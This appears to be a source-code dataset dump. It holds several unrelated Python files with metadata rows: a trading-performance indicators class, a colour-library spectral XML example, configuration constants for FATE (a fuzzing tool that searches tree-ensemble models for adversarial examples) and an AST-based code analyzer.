self.year_slice[year].ix[i, 'max'] = self.year_slice[year].ix[i, asset]
else:
self.year_slice[year].ix[i, 'max'] = self.year_slice[year].ix[i-1, 'max']
self.year_slice[year].ix[i, 'max_time'] = self.year_slice[year].ix[i-1, 'max_time']
self.year_slice[year]['retreat']=(self.year_slice[year][asset]- self.year_slice[year]['max'])/self.year_slice[year]['max']
max_draw = min(self.year_slice[year]['retreat'])
data = self.year_slice[year][self.year_slice[year]['retreat'] == max_draw]
t1 = data['tradeDate']#
t2 = data['max_time']
#print('The worst draw interval for %s in %s is %s %s' %(asset,year,str(t1),str(t2)))
return t1,t2
###总换手
def total_turnover(self,asset,year):
turnover = asset.replace('asset','turnover')
print('The total turnover for %s in %s is %f' %(asset,year,sum(self.year_slice[year][turnover])))
return sum(self.year_slice[year][turnover])
###日均换手
def average_daily_turnover(self,asset,year):
t1 = time.strptime(self.year_slice[year]['time'].iat[0],"%Y-%m-%d")
t2 = time.strptime(self.year_slice[year]['time'].iat[-1],"%Y-%m-%d")
d1 = datetime.datetime(t1.tm_year, t1.tm_mon, t1.tm_mday)
d2 = datetime.datetime(t1.tm_year, t2.tm_mon, t2.tm_mday)
n = (d2-d1).days
print('The average daily turnover for %s in %s is %f' %(asset,year,self.total_turnover(asset,year)/n))
return self.total_turnover(asset,year)/n
###日均持仓
def average_daily_position(self,asset,year):
position = asset.replace('asset','position')
print('The average daily position for %s in %s is %f' %(asset,year,self.year_slice[year][position].mean()))
return self.year_slice[year][position].mean()
###次均收益
def minor_average_return(self,asset,year):
position = asset.replace('asset','position')
sum_pos = sum(self.year_slice[year][self.year_slice[year][position]!=0][position])
num = len(self.year_slice[year][self.year_slice[year][position]!=0][position])
print('The minor average return for %s in %s is %f' %(asset,year,sum_pos/num))
return sum_pos/num
def write_indicators_concat(self,path):
frames = []
for items in self.year_slice:
temp_data = []
temp_index = []
for k in self.params:
x = [items,
self.annual_return('asset'+ str(k),items),
self.max_draw('asset'+ str(k),items),
self.volatility('asset'+ str(k),items),
self.sharp('asset'+ str(k),0,items),
self.calmar('asset'+ str(k),items),
self.daily_win_ratio('asset'+ str(k),items),
self.win_lose_ratio('asset'+ str(k),items),
self.total_turnover('asset'+ str(k),items),
self.average_daily_turnover('asset'+ str(k),items),
self.average_daily_position('asset'+ str(k),items),
self.minor_average_return('asset'+ str(k),items)]
temp_data.append(x)
temp_index.append('asset'+ str(k))
DataFrame = pd.DataFrame(temp_data,index=temp_index,columns=['year','annual_return', 'max_draw', 'volatility', 'sharp','calmar','daily_win_ratio','win_lose_ratio','total_turnover','average_daily_turnover','average_daily_position','minor_average_return'])
frames.append(DataFrame)
DataFrame = pd.concat(frames)
DataFrame.to_csv(path_or_buf=path)
def plot_figure(self,asset_num):
t1 = time.strptime(self.dataframe['time'].iat[0],"%Y-%m-%d")
t2 = time.strptime(self.dataframe['time'].iat[-1],"%Y-%m-%d")
d1 = datetime.datetime(t1.tm_year, t1.tm_mon, t1.tm_mday)
d2 = datetime.datetime(t1.tm_year, t2.tm_mon, t2.tm_mday)
plt.figure()
plt.subplots_adjust(hspace=1, wspace=1)
plt.subplot(3,1,1)
self.dataframe['asset'+ str(asset_num)].plot(legend = True)
self.dataframe['cumulative_return'].plot(x=None, y=None, kind='line', ax=None, subplots=False, sharex=None, sharey=False, layout=None, figsize=None, use_index=True, title=None, grid=None, legend=True, style=None, logx=False, logy=False, loglog=False, xticks=None, yticks=None, xlim=None, ylim=None, rot=None, fontsize=None, colormap=None, table=False, yerr=None, xerr=None, secondary_y=False, sort_columns=False)
plt.subplot(3,1,2)
f2 = plt.bar(range(len(self.dataframe['transaction'+ str(asset_num)])), self.dataframe['transaction'+ str(asset_num)].tolist(),tick_label= None,label='transaction'+ str(asset_num))
plt.legend((f2,),('transaction'+ str(asset_num),))
plt.subplot(3,1,3)
f3 = plt.bar(range(len(self.dataframe['pnl'+ str(asset_num)])),self.dataframe['pnl'+ str(asset_num)].tolist(),label='pnl'+ str(asset_num))
plt.legend((f3,),('pnl'+ str(asset_num),))
plt.show()
if __name__=='__main__':
indicators = Indicators('/Users/zhubaobao/Documents/Quant/ZXJT/total3.csv', [5,10,20])
#indicators.write_indicators_concat('/Users/zhubaobao/Documents/Quant/ZXJT/write_indicators.csv')
indicators.plot_figure(10)
| 53.287179 | 420 | 0.630161 | 1,550 | 10,391 | 4.090968 | 0.132258 | 0.090837 | 0.147611 | 0.182306 | 0.607633 | 0.540293 | 0.434789 | 0.415707 | 0.368869 | 0.325974 | 0 | 0.016833 | 0.188144 | 10,391 | 194 | 421 | 53.561856 | 0.734827 | 0.0537 | 0 | 0.198676 | 0 | 0 | 0.122662 | 0.009404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.099338 | false | 0 | 0.046358 | 0 | 0.231788 | 0.066225 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10ad5bf59feb60ba24a561f3cbe2b398632d6514 | 1,785 | py | Python | colour/examples/io/examples_ies_tm2714.py | BPearlstine/colour | 40f0281295496774d2a19eee017d50fd0c265bd8 | [
"Cube",
"BSD-3-Clause"
] | 2 | 2020-05-03T20:15:42.000Z | 2021-04-09T18:19:06.000Z | colour/examples/io/examples_ies_tm2714.py | BPearlstine/colour | 40f0281295496774d2a19eee017d50fd0c265bd8 | [
"Cube",
"BSD-3-Clause"
] | null | null | null | colour/examples/io/examples_ies_tm2714.py | BPearlstine/colour | 40f0281295496774d2a19eee017d50fd0c265bd8 | [
"Cube",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Showcases input / output *IES TM-27-14* spectral data XML files related
examples.
"""
import os
import colour
from colour.utilities import message_box
RESOURCES_DIRECTORY = os.path.join(os.path.dirname(__file__), 'resources')
message_box('"IES TM-27-14" Spectral Data "XML" File IO')
message_box('Reading spectral data from "IES TM-27-14" "XML" file.')
sd = colour.SpectralDistribution_IESTM2714(
os.path.join(RESOURCES_DIRECTORY, 'TM27 Sample Spectral Data.spdx'))
sd.read()
print(sd)
print('\n')
message_box('"IES TM-27-14" spectral data "XML" file header:')
print('Manufacturer: {0}'.format(sd.header.manufacturer))
print('Catalog Number: {0}'.format(sd.header.catalog_number))
print('Description: {0}'.format(sd.header.description))
print('Document Creator: {0}'.format(sd.header.document_creator))
print('Unique Identifier: {0}'.format(sd.header.unique_identifier))
print('Measurement Equipment: {0}'.format(sd.header.measurement_equipment))
print('Laboratory: {0}'.format(sd.header.laboratory))
print('Report Number: {0}'.format(sd.header.report_number))
print('Report Date: {0}'.format(sd.header.report_date))
print('Document Creation Date: {0}'.format(sd.header.document_creation_date))
print('Comments: {0}'.format(sd.header.comments))
print('\n')
message_box('"IES TM-27-14" spectral data "XML" file spectral distribution:')
print('Spectral Quantity: {0}'.format(sd.spectral_quantity))
print('Reflection Geometry: {0}'.format(sd.reflection_geometry))
print('Transmission Geometry: {0}'.format(sd.transmission_geometry))
print('Bandwidth FWHM: {0}'.format(sd.bandwidth_FWHM))
print('Bandwidth Corrected: {0}'.format(sd.bandwidth_corrected))
print('\n')
message_box('"IES TM-27-14" spectral data "XML" file spectral data:')
print(sd)
| 35.7 | 77 | 0.746779 | 253 | 1,785 | 5.166008 | 0.26087 | 0.085692 | 0.110176 | 0.126243 | 0.254782 | 0.160673 | 0.160673 | 0.142311 | 0.142311 | 0.142311 | 0 | 0.028624 | 0.080112 | 1,785 | 49 | 78 | 36.428571 | 0.767357 | 0.058263 | 0 | 0.151515 | 0 | 0 | 0.375374 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.636364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
10b3898c39cc445a1d7a9fa450e58ed1fdf4ed6d | 13,823 | py | Python | python/constants.py | cbilstra/FATE | 40f3962db471764e1cfcd39e295a13308b7d85fd | [
"MIT"
] | null | null | null | python/constants.py | cbilstra/FATE | 40f3962db471764e1cfcd39e295a13308b7d85fd | [
"MIT"
] | null | null | null | python/constants.py | cbilstra/FATE | 40f3962db471764e1cfcd39e295a13308b7d85fd | [
"MIT"
] | null | null | null | import os
from os.path import join
INVESTIGATE = False # Records coverages and saves them. Generates a plot in the end. Do not use with automate.
TEST_OUTSIDE_FUZZER = False # Runs FATE as standalone (1+1) EA
BLACKBOX = True and TEST_OUTSIDE_FUZZER # Disables white-box information such as thresholds and feat imp.
FORCE_DEFAULT_EPSILON = True or TEST_OUTSIDE_FUZZER # Runs all datasets with the default epsilon
FORCE_DEFAULT_MUTATION_CHANCE = False or TEST_OUTSIDE_FUZZER # Runs all datasets with the default mutation chance
LIMIT_TIME = True # If false, run 10 times as long
############ FATE Standalone ############
CROSSOVER_CHANCE = 0.001 # Chance that crossover occurs
CROSSOVER_RANDOM_CHANCE = 1.0 # Actual chance for crossover with random features is 0.001
# CROSSOVER_CHANCE * CROSSOVER_RANDOM_CHANCE
NUM_RUNS = 100000000 # Unlimited. Change for smaller amount of runs
POPULATION_SIZE = 1 # Population size.
############ RQ 1 defaults ############
MEASURE_EXEC_P_S = True # Parse the number of executions per second.
ALLOW_FLOAT_MIS_CLASSIFICATION = True # If True, do not filter mis-classifications from the produced AE
CONSISTENT_DRAWS = True # Seeds random with 0, to create consistent check-set draws
FUZZ_ONE_POINT_PER_INSTANCE = True # compile to generic fuzz target and fuzz per point
USE_CUSTOM_MUTATOR = True # If False, use the standard mutator of LibFuzzer
USE_CROSSOVER = True and USE_CUSTOM_MUTATOR # Combines mutation with crossover (split at random location)
USE_GAUSSIAN = True # Gaussian vs random uniform mutation
USE_PROBABILITY_STEPS_SPECIAL = True # Proba descent based on small proba diff between 2nd class predicted
PROBA_LIMIT_WITHIN_EPSILON = True # Only save seeds if within epsilon
WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES = True # Saves execution time
ALWAYS_OPTIMIZE = True # Otherwise only optimize small files
MUTATE_DEPTH = 7 if TEST_OUTSIDE_FUZZER else 5 # The maximum number of consecutive mutations per seed for LibFuzzer
DEFAULT_EPSILON = 0.1 if TEST_OUTSIDE_FUZZER else 0.2 # Default epsilon
DEFAULT_MUTATE_CHANCE = 0.5 if TEST_OUTSIDE_FUZZER else 0.1 # Chance that a single features is mutated
FUZZER = 'libFuzzer'
# FUZZER = 'AFL++'
# FUZZER = 'honggfuzz'
# FUZZER = 'AFLGo'
FUZZERS = ['libFuzzer', 'AFL++', 'AFLGo', 'honggfuzz']
if FUZZER not in FUZZERS:
raise ValueError(f'Fuzzer {FUZZER} not recognised, should be one of [{", ".join(FUZZERS)}]')
if FUZZER == 'honggfuzz' and USE_CUSTOM_MUTATOR:
raise ValueError('Honggfuzz and custom mutator is not supported')
############ RQ 2 defaults ############
AE_MUTATE_TOWARDS_VICTIM = True # If AE, mutate values only towards victim point.
MUTATE_BIGGEST_CHANCE = 0.5 # When an AE is found, the chance to only mutate all biggest difference fs towards victim
ALSO_MUTATE_BIGGEST = True # Always mutate all features > the biggest l-inf distance - 0.01. Only with FUZZ_ONE
# These alter the chance that a feature is mutated
BIAS_MUTATE_BIG_DIFFS = True
USE_THRESHOLDS_FOR_MUTATION = True and not BLACKBOX # move to optimal boundary value after drawing from mutation dist
# Fuzzes for each datapoint with and without AE init
DOUBLE_FUZZ_WITH_AE = True and not (TEST_OUTSIDE_FUZZER or INVESTIGATE)
USE_FEATURE_IMPORTANCE = True and not BLACKBOX # prioritize more important features for mutation
INITIALIZE_WITH_POINT_IN_BETWEEN = True and DOUBLE_FUZZ_WITH_AE
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = True and INITIALIZE_WITH_POINT_IN_BETWEEN
if TEST_OUTSIDE_FUZZER and (not FUZZ_ONE_POINT_PER_INSTANCE):
raise ValueError('Test outside fuzzer conflicting options')
if TEST_OUTSIDE_FUZZER and DOUBLE_FUZZ_WITH_AE and (POPULATION_SIZE < 2 or CROSSOVER_RANDOM_CHANCE > 0.99):
raise ValueError('Test outside fuzzer double fuzz configuration problem')
############ RQ 1.2 defaults ############
FILTER_BAD_AE = True # If True, discards all AE that are worse than FAILURE_THRES
FUZZ_ONLY_COV_FOR_FOREST = False # Only insert coverage-guidance for the lines that belong to the Forest
FUZZ_ONLY_COV_FOR_CHECK = True # Only insert coverage-guidance for the lines that belong to the objective function
FUZZ_WITHOUT_COVERAGE_GUIDANCE = False # If True, baseline: removes almost all coverage guidance (except TestOneInput)
if FUZZER == 'AFL++' and FUZZ_WITHOUT_COVERAGE_GUIDANCE:
raise ValueError('AFL++ crashes because the fuzzer name cannot be set with the -n (no instrument) option')
############ Objective function settings ############
COMBINE_DISTANCE_AND_PROBABILITY = False # distance = distance + probability
USE_PROBABILITY_STEPS = False # probability steps in the check function ELSE branch
PROBA_SPECIAL_ALWAYS = False
PROBA_SPECIAL_START_STEP = 0.2
PROBA_SPECIAL_STEP_SIZE = 0.01
WRITE_AE_ALWAYS_IN_IF = False # Slower option for the objective function
if USE_PROBABILITY_STEPS and USE_PROBABILITY_STEPS_SPECIAL:
raise ValueError('Select at most one type of probability step')
if WRITE_AE_ALWAYS_IN_IF and WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES:
raise ValueError('Only one write_X can be used on the settings')
############ Fuzzer settings ############
NEVER_OPTIMIZE = False
FORCE_ENTROPIC = False # libfuzzer. Experimental. Enables entropic power schedule.
NO_ENTROPIC = False
FOCUS_FUNCTION = "0" # focus_function 0 Experimental. Fuzzing will focus on inputs that trigger calls
# # to this function. If -focus_function=auto and -data_flow_trace is used, libFuzzer will choose the
# focus functions automatically.
if sum([FUZZ_WITHOUT_COVERAGE_GUIDANCE, FUZZ_ONLY_COV_FOR_CHECK, FUZZ_ONLY_COV_FOR_FOREST]) > 1:
raise ValueError('Only one coverage guidance option can be used at the same time')
if NEVER_OPTIMIZE and ALWAYS_OPTIMIZE:
raise ValueError('Conflicting optimize options')
############ AFL settings ############
# TIME_NO_NEW_COV = 10
IS_AE_CHANCE = 0.5 # Because we cannot access the fuzzer logic in the mutator
NUM_CYCLES_IN_LOOP = 1000 # Number of consecutive iterations after which we start with a clean sheet
AFL_USE_DICT = True and not USE_CUSTOM_MUTATOR
AFL_USE_CMP_LOG = False and not USE_CUSTOM_MUTATOR
ENABLE_DETERMINISTIC = False
SKIP_DETERMINISTIC = False
# see docs/power_schedules.md
AFL_SCHEDULE = None # one of fast(default, use None), explore, exploit, seek, rare, mmopt, coe, lin, quad
# AFL generic
AFL_MUTATE_FILENAME = "afl_mutation.cc"
AFL_OUTPUT_DIR = "afl_out"
# AFL++
AFLPP_DICT_PATH = join(os.getcwd(), 'afl_dict')
AFLPP_TEMPLATE_PATH = "templates/aflpp.jinja2"
MUTATE_TEMPLATE_PATH = "templates/mutate.jinja2"
AFLPP_COMPILER_PATH = "afl-clang-lto++"
# AFLPP_COMPILER_PATH = "afl-clang-fast++"
# AFLGo
AFL_GO_COMPILER_PATH = "/home/cas/AFLGo/afl-clang-fast++"
AFL_GO_FUZZ_PATH = "/home/cas/AFLGo/afl-fuzz"
AFL_GO_GEN_DIST_PATH = "/home/cas/AFLGo/scripts/gen_distance_fast.py"
AFL_GO_TARGETS_FILE = 'BBtargets.txt'
AFLGO_TEMPLATE_PATH = "templates/aflgo.jinja2"
############ honggfuzz settings ############
HONG_COMPILER_PATH = "/home/cas/honggfuzz/hfuzz_cc/hfuzz-clang++"
HONG_FUZZER_PATH = "/home/cas/honggfuzz/honggfuzz"
HONG_OUTPUT_DIR = "hongg_out"
############ Mutation settings ############
MINIMIZE_THRESHOLD_LIST = False # Removes all thresholds within 0.0001 from each other
IS_AE_FAKE = False # Fakes the model query if the current input is an AE
USE_WAS_AE = False # Saves the result of the last known model query
STEEP_CURVE = False # If True, square the draw from the gaussian distribution, such that smaller draws are more likely
# feature importance is calculated by its occurrence
FEATURE_IMPORTANCE_BASED_ON_OCCURRENCE = False and USE_FEATURE_IMPORTANCE
MUTATE_LESS_WHEN_CLOSER = False # When True, multiplies mutation with largest diff between fuzzed and victim.
# as splitting threshold in the forest. Cannot be true together with AE_MUTATE_TOWARDS_VICTIM
AE_CHECK_IN_MUTATE = (ALSO_MUTATE_BIGGEST or BIAS_MUTATE_BIG_DIFFS or USE_THRESHOLDS_FOR_MUTATION or
AE_MUTATE_TOWARDS_VICTIM or MUTATE_LESS_WHEN_CLOSER) and FUZZ_ONE_POINT_PER_INSTANCE \
and FUZZER != 'AFL++'
if MUTATE_LESS_WHEN_CLOSER and AE_MUTATE_TOWARDS_VICTIM:
raise ValueError('Mutate less and AE mutate towards original cannot be used together')
############ AE init ############
# k-ANN structure
ANN_TREES = 10 # the amount of trees for the "annoy" lookup
K_ANN = 10 # how many nearest neighbours to find
NO_SEED_INIT = False # When True, each run is only seeded with all-0 features. No input is not possible, because
# The custom mutator would otherwise break.
INITIALIZE_WITH_AE = False # use ANN to seed with K_ANN closest data-points from other classes
INITIALIZE_WITH_AVG_OPPOSITE = False # For binary-classification: seed with average member of the other class
INITIALIZE_WITH_POINT_IN_BETWEEN = INITIALIZE_WITH_POINT_IN_BETWEEN or \
(True and INITIALIZE_WITH_AE)
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN or \
(True and INITIALIZE_WITH_POINT_IN_BETWEEN)
INITIALIZE_WITH_FULL_TRAIN_SET = False # Put all instances of other class from test set in corpus.
if INITIALIZE_WITH_FULL_TRAIN_SET and (INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE):
raise ValueError('INITIALIZE_WITH_FULL_TRAIN_SET cannot be used with INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE')
if sum([INITIALIZE_WITH_AE, INITIALIZE_WITH_AVG_OPPOSITE, INITIALIZE_WITH_FULL_TRAIN_SET]) > 1:
raise ValueError('Conflicting initialize options')
############ Testing ############
DEBUG = False # If True, shows output and runs 1 sample with 1 thread only.
MEASURE_COVERAGE = False # Measure coverage through instrumentation, costs exec/s
SKIP_COMPILATION = False
COMPILE_ONLY = False
PRINT_NUMBER_OF_LEAVES = False # Estimate for model size
INVESTIGATE_WITH_SCATTER = False and INVESTIGATE # Shows a scatter plot instead of a line plot when INVESTIGATE
NUM_INVESTIGATE_RUNS = 5 # The number of repetitions for creating plots.
FAILURE_THRES = 0.9 # See FILTER_BAD_AE
SHOW_OUTPUT = False or DEBUG # Shows fuzzer output
CREATE_LOOKUP = False or INITIALIZE_WITH_AE or INITIALIZE_WITH_AVG_OPPOSITE or INVESTIGATE \
or INITIALIZE_WITH_FULL_TRAIN_SET or DOUBLE_FUZZ_WITH_AE
if DEBUG and MEASURE_EXEC_P_S:
raise ValueError('Debug and measure exec/s cannot be used at the same time')
if INVESTIGATE and DOUBLE_FUZZ_WITH_AE:
raise ValueError('Double fuzz together with investigate should not be used.')
NUM_DEBUG = 1
NUM_THREADS = 10 if not DEBUG else NUM_DEBUG # Number of simultaneous fuzzing instances, but is also
# Used for training the ensembles, the MILP attack and the lt-attack (Zhang)
NUM_ADV_SUPER_QUICK = 10 # The number of victims to attack for runs with the -qq flag.
NUM_ADV_QUICK = 50 # The number of victims to attack for runs with the -q flag.
NUM_ADV_CHECKS = 500 if not DEBUG else NUM_DEBUG # number of adversarial victims
MAX_POINTS_LOOKUP = 5000 # The AE lookup will be created over this amount of training samples maximum
DEFAULT_TIME_PER_POINT = 1 # The default fuzzing time per datapoint
MODEL_TYPES = ['RF', 'GB'] # the identifiers of the model types (Random Forest, Gradient Boosting)
DISTANCE_NORMS = ['l_0', 'l_1', 'l_2', 'l_inf']
DISTANCE_NORM = 'l_inf' # the norm to calculate the distance in the fuzzer
if DISTANCE_NORM not in DISTANCE_NORMS:
raise ValueError(f'Norm {DISTANCE_NORM} not recognised, should be one of [{", ".join(DISTANCE_NORMS)}]')
DISTANCE_STEPS = [round(0.005 * i, 3) for i in reversed(range(1, 201))] # [1.0, 0.995, ..., 0.005]
# DISTANCE_STEPS = [round(0.001 * i, 3) for i in reversed(range(1, 1001))] # [1.0, 0.999, ..., 0.001]
# DISTANCE_STEPS = [round(0.01 * i, 2) for i in reversed(range(1, 101))] # [1.0, 0.99, ..., 0.01]
# DISTANCE_STEPS = [round(0.1 * i, 1) for i in reversed(range(1, 11))] # [1.0, 0.99, ..., 0.01]
# DISTANCE_STEPS = [0.8, 0.7, 0.6] \
# + [round(0.01 * i, 2) for i in reversed(range(11, 51))] \
# + [round(0.001 * i, 3) for i in reversed(range(1, 101))] # Decreasing
# DISTANCE_STEPS = [0.8, 0.7] \
# + [round(0.01 * i, 2) for i in reversed(range(25, 70))] \
# + [round(0.001 * i, 3) for i in reversed(range(20, 250))] \
# + [round(0.0001 * i, 4) for i in reversed(range(1, 200))] # Decreasing very small
DISTANCE_STEPS.append(0.000001)
PROBABILITY_STEPS = [round(0.01 * i, 2) for i in reversed(range(1, 51))] # [1.0, 0.99, ..., 0.01]
# PROBABILITY_STEPS = [0.8, 0.7, 0.6] \
# + [round(0.01 * i, 2) for i in reversed(range(1, 51))] # [0.8, 0.7, ..., 0.5, 0.49...]
# PROBABILITY_STEPS = [round(0.5 + 0.05 * i, 2) for i in reversed(range(1, 11))] \
# + [round(0.2 + 0.01 * i, 2) for i in reversed(range(1, 31))] \
# + [round(0.005 * i, 3) for i in reversed(range(1, 41))]
# Directories, all relative to main folder (code)
CHECK_DIR = "python/.CHECK"
IMAGE_DIR = 'python/img'
RESULTS_DIR = "python/.RESULTS"
COVERAGES_DIR = "python/.COVERAGES"
MODEL_DIR = "python/models"
JSON_DIR = join(MODEL_DIR, 'json')
DATA_DIR = "python/data"
LIB_SVM_DIR = join(DATA_DIR, 'libsvm')
OPEN_ML_DIR = join(DATA_DIR, 'openml')
ZHANG_DATA_DIR = join(DATA_DIR, 'zhang')
CORPUS_DIR = ".GENERATED_CORPUS"
ADV_DIR = ".ADVERSARIAL_EXAMPLES"
ZHANG_CONFIG_DIR = ".ZHANG_CONFIGS"
# Files
NUM_FEATURES_PATH = ".num_features"
LIBFUZZER_TEMPLATE_PATH = "templates/libfuzzer.jinja2"
OUTPUT_FILE = "fuzzme.cc"
# WARNING, run with --reload (once for each dataset) after changing these.
DEFAULT_LEARNING_RATE_GB = 0.1
TEST_FRACTION = 0.2
NUM_SAMPLES = 2500 # For synthetic datasets
# Better not change these
SMALL_PERTURBATION_THRESHOLD = 0.00001
THRESHOLD_DIGITS = 7
BYTES_PER_FEATURE = 8 # float = 4, double = 8
TIME_PRECISION = 4
def get_num_adv(): return NUM_ADV_CHECKS
| 56.651639 | 119 | 0.747667 | 2,130 | 13,823 | 4.628639 | 0.241784 | 0.03124 | 0.00852 | 0.01988 | 0.219799 | 0.148189 | 0.129323 | 0.092301 | 0.06522 | 0.06522 | 0 | 0.027197 | 0.159444 | 13,823 | 243 | 120 | 56.884774 | 0.821327 | 0.424582 | 0 | 0 | 1 | 0 | 0.190149 | 0.044764 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005917 | false | 0 | 0.023669 | 0.005917 | 0.029586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52a1c2d78cfb1a125c997f8dc53947a5b9217444 | 5,988 | py | Python | code_analyzer/core.py | draihal/code_analyzer | 05f56a3f44bbf9e1ccd9bd25b2fbafb631486ad7 | [
"MIT"
] | null | null | null | code_analyzer/core.py | draihal/code_analyzer | 05f56a3f44bbf9e1ccd9bd25b2fbafb631486ad7 | [
"MIT"
] | null | null | null | code_analyzer/core.py | draihal/code_analyzer | 05f56a3f44bbf9e1ccd9bd25b2fbafb631486ad7 | [
"MIT"
] | null | null | null | import logging
import os
import shutil
import tempfile
from git import Repo
from .ast_analysis import _get_all_names, _get_all_func_names, _generate_trees
from .ntlk_analysis import _get_verbs_from_function_name, _get_nouns_from_function_name
from .utils import _get_count_most_common, _get_converted_names, _convert_tpls_to_lst
logging.basicConfig(
filename='code_analyzer.log',
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S',
level=logging.INFO)
class CodeAnalyzer:
"""Code analyzer main class."""
def __init__(
self,
path='C:\\',
lookup='verb',
projects=('', ),
top_size=10,
len_filenames=100,
github_path=None,
):
logging.info("Program started.")
self.path = path
self.github_path = github_path
self.lookup = lookup
self.projects = projects
self.top_size = top_size
self.len_filenames = len_filenames
self.words = []
def _get_filenames(self, path):
"""
Get filenames from path.
:param path: path
:return: list
"""
filenames = []
for dirname, dirs, files in os.walk(path, topdown=True):
for file in files:
if file.endswith('.py'):
filenames.append(os.path.join(dirname, file))
if len(filenames) == self.len_filenames:
break
logging.info(f"Path is: {path}.")
logging.info(f"Total {len(filenames)} files.")
return filenames
def _get_trees(self, path, with_filenames=False, with_file_content=False):
"""
Returns lists of ast objects.
:param path: path
:return: lists of ast objects
"""
filenames = self._get_filenames(path)
trees = (_generate_trees(filename, with_filenames,
with_file_content)[0]
for filename in filenames)
logging.info("Trees generated.")
return trees
def _get_top_verbs_in_path(self, path):
"""
Returns a list of tuples with words and his counts.
:param path: path
:return: list of tuples with words and his counts
"""
trees = self._get_trees(path)
fncs = _get_converted_names(trees, _get_all_func_names)
verbs = (_get_verbs_from_function_name(function_name)
for function_name in fncs)
converted_verbs = _convert_tpls_to_lst(verbs)
return converted_verbs
def _get_top_nouns_in_path(self, path):
"""
Returns a list of tuples with words and his counts.
:param path: path
:return: list of tuples with words and his counts
"""
trees = self._get_trees(path)
fncs = _get_converted_names(trees, _get_all_func_names)
nouns = (_get_nouns_from_function_name(function_name)
for function_name in fncs)
converted_nouns = _convert_tpls_to_lst(nouns)
return converted_nouns
def _get_all_words_in_path(self, path):
"""
Returns a list of tuples with words and his counts.
:param path: path
:return: list of tuples with words and his counts
"""
trees = self._get_trees(path)
function_names = _get_converted_names(trees, _get_all_names)
all_words_in_path = ((word for word in function_name.split('_')
if word) for function_name in function_names)
converted_all_words_in_path = _convert_tpls_to_lst(all_words_in_path)
return converted_all_words_in_path
def _get_top_functions_names_in_path(self, path):
"""
Returns a list of tuples with words and his counts.
:param path: path
:return: list of tuples with words and his counts
"""
trees = self._get_trees(path)
fncs = _get_converted_names(trees, _get_all_func_names)
return fncs
def _parse_lookup_args(self, path_):
"""
Parse arguments for lookup.
:param path_: path
:return: None
"""
# verb - show statistics of the most common words by verbs
# noun - show statistics on the most frequent words by nouns
# funcname - show statistics of the most common words function names
# localvarname - show statistics of the most common
# words names of local variables inside functions
lookups_functions = {
'verb': self._get_top_verbs_in_path,
'noun': self._get_top_nouns_in_path,
'funcname': self._get_top_functions_names_in_path,
'localvarname': self._get_all_words_in_path,
}
for project in self.projects:
path = os.path.join(path_, project)
function_for_lookup = lookups_functions.get(self.lookup)
self.words += function_for_lookup(path)
def parse(self):
"""
Returns a list of tuples with words and his counts.
:return: list of tuples with words and his counts
"""
if self.github_path:
tmpdir = tempfile.mkdtemp()
logging.info(f'Created temporary directory: {tmpdir}.')
Repo.clone_from(self.github_path, tmpdir)
self._parse_lookup_args(tmpdir)
top_words = _get_count_most_common(self.words, self.top_size)
try:
shutil.rmtree(tmpdir)
except PermissionError:
logging.info(
'Can\'t deleting temp directory. Access is denied.')
logging.info('Done!')
return [] if len(top_words) == 0 else top_words
else:
self._parse_lookup_args(self.path)
top_words = _get_count_most_common(self.words, self.top_size)
logging.info("Done!")
return [] if len(top_words) == 0 else top_words
| 36.512195 | 87 | 0.609552 | 736 | 5,988 | 4.654891 | 0.195652 | 0.021016 | 0.035026 | 0.046702 | 0.424985 | 0.34822 | 0.32662 | 0.296848 | 0.296848 | 0.285464 | 0 | 0.001934 | 0.309285 | 5,988 | 163 | 88 | 36.736196 | 0.826402 | 0.183701 | 0 | 0.125 | 1 | 0 | 0.053345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086538 | false | 0 | 0.076923 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52a274d162d9e0ff675d928c3cfccd89b9f1212e | 8,449 | py | Python | assemblyline_ui/security/ldap_auth.py | CybercentreCanada/assemblyline-ui | 4b44b26852ef587d1c627fa63c778a135209e25e | [
"MIT"
] | 11 | 2020-06-29T14:31:38.000Z | 2022-01-14T17:15:06.000Z | assemblyline_ui/security/ldap_auth.py | CybercentreCanada/assemblyline-ui | 4b44b26852ef587d1c627fa63c778a135209e25e | [
"MIT"
] | 20 | 2020-06-22T12:35:30.000Z | 2022-03-10T12:41:46.000Z | assemblyline_ui/security/ldap_auth.py | CybercentreCanada/assemblyline-ui | 4b44b26852ef587d1c627fa63c778a135209e25e | [
"MIT"
